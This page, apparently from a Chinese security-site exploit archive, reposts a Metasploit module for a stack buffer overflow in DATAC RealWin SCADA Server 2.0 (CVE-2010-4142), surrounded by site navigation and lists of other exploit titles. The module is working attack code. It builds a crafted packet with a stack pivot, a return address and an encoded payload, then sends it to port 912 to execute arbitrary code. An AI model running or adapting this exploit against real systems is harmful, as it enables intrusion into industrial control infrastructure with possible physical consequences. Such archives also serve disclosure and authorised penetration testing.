首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow(meta)
来源:http://www.metasploit.com 作者:MC 发布时间:2010-11-25  
##
# $Id: realwin_scpc_txtevent.rb 11125 2010-11-24 13:44:46Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in DATAC Control
				International RealWin SCADA Server 2.0 (Build 6.1.8.10).
				By sending a specially crafted packet,
				an attacker may be able to execute arbitrary code.
			},
			'Author'         => [ 'Luigi Auriemma', 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11125 
, 'References' => [ [ 'CVE', '2010-4142'], [ 'OSVDB', '68812'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 550, 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Universal', { 'Pivot' => 0x40017fc2, 'Ret' => 0x4001f6d0 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 18 2010')) register_options([Opt::RPORT(912)], self.class) end def exploit connect data = [0x6a541264].pack('V') data << [0x00000010].pack('V') data << [0x00001ff4].pack('V') data << rand_text_alpha_upper(164) data << [target['Pivot']].pack('V') data << rand_text_alpha_upper(16) data << [target.ret].pack('V') data << payload.encoded data << rand_text_alpha_upper(10024 - payload.encoded.length) print_status("Trying target #{target.name}...") sock.put(data) handler disconnect end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Task Scheduler Privile
·Elevation of privileges under
·Foxit PDF Reader v4.1.1 Title
·Sun Java Web Start BasicServic
·NCH Officeintercom <= v5.20 Re
·ImageShack Toolbar 4.8.3.75 Re
·Linux/ARM - add root user with
·Netcraft Toolbar 1.8.1 Remote
·OSX/Intel - setuid shell x86_6
·Xion Audio Player 1.0.127 (m3u
·Linux Kernel 'setup_arg_pages(
·Xion Audio Player 1.0.126 (.m3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved